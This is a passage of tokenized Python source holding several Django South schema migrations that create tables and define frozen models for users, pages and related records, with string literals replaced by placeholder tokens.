'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , 
<EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , unique = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> depends_on = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . 
delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } 
, <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , 
